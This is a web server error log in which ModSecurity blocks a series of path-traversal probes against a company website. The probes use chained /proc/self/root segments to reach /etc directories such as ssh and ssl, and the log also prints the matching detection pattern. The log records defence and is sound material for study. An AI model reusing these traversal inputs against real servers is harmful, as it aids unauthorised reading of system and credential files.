[Tue Mar 17 09:46:10.796760 2026] [:error] [pid 11469:tid 140411616036608] [client 74.7.243.203:50328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNEpDEJR9VXonE_-1RagAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:46:23.611128 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.243.203:37162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNHweiSKl8TjouI-YEFQAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:46:53.370991 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.241.46:49664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNPdCmCSWTlPouqorN-wAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:46:55.756078 2026] [:error] [pid 1731:tid 140411582465792] [client 74.7.241.46:54124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNPwb2qCuy5irgBMjLNwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:46:57.023148 2026] [:error] [pid 2553:tid 140411607643904] [client 74.7.241.46:54136] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNQf0Bec_B9OkZP_i_KQAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:02.519034 2026] [:error] [pid 2159:tid 140411683178240] [client 74.7.241.46:39948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNRvct6CQ8jnRyg2p-JwAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:03.835046 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:39958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNR-82sZHvlq4xgHrE_gAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:05.015278 2026] [:error] [pid 1016:tid 140411708356352] [client 74.7.241.46:39968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNSZqmL8PQht4WJFlKgAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:06.336235 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:39982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNSgeiSKl8TjouI-YELQAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:08.769062 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.46:39994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNTAeiSKl8TjouI-YENAAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:10.114613 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:50130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNTu82sZHvlq4xgHrFBAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:13.867241 2026] [:error] [pid 1731:tid 140411666392832] [client 74.7.241.46:50132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNUQb2qCuy5irgBMjLQwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:15.235264 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.241.46:50146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNU1KJy4A1bGlmj9BXnwAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:22.340252 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.241.46:50150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNWu82sZHvlq4xgHrFDAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:23.205130 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.203:54594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNW6BJNF7axNlVR0X-zwAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:47:25.966497 2026] [:error] [pid 2553:tid 140411607643904] [client 74.7.243.203:45794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNXP0Bec_B9OkZP_i_NgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:47:28.221352 2026] [:error] [pid 2553:tid 140411540502272] [client 74.7.241.46:34144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNYP0Bec_B9OkZP_i_OQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:29.587580 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.241.46:41746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNYdCmCSWTlPouqorOEQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:32.000660 2026] [:error] [pid 1016:tid 140411624429312] [client 74.7.241.46:41760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNY5qmL8PQht4WJFlKkAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:35.224937 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.241.46:41772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNZweiSKl8TjouI-YEPQAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:47:37.627630 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.241.46:41774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablNaVKJy4A1bGlmj9BXsQAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
